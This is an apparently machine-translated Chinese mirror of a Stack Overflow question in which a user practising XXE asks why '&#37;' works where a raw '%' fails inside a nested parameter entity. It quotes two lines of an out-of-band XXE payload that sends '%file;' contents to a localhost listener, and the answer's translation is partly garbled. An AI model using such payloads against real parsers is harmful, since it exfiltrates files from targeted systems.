首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >问答首页 >在这个XML中'%‘是什么意思?

在这个XML中'%‘是什么意思?
EN

Stack Overflow用户
提问于 2021-10-17 02:26:21
回答 1查看 32关注 0票数 0

当我练习XXE时,我发现当我使用下面的DTD实体发送我的请求时,它是有效的。

代码语言:javascript
运行
复制
<!ENTITY % print "<!ENTITY &#37; send SYSTEM 'http://localhost:9090/landing?text=%file;'>">

但是当我发这个的时候它不起作用。

代码语言:javascript
运行
复制
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">

它们之间的区别是"%“和"%",我想知道为什么当我在这里直接使用"%”时它不起作用。谢谢。

EN

回答 1

Stack Overflow用户

发布于 2021-10-17 02:30:06

这是%文件的PARAMETER ENTITY声明中的一个超文本标记语言编码的百分号(转义序列)--为了不破坏语法,XML使用超文本标记语言编码。

在Android XML中也是如此,它也知道%% ...

在这里,原始的%通常用于替换。

规范版本将是:

因为XML语法对标记和属性使用了一些字符,所以不可能直接在XML标记或属性值中使用这些字符。

这就是为什么XML中的一些特殊字符的行为类似于“保留关键字”。

另请参阅15.3. Understanding XML DTDs

票数 2
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/69600886

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档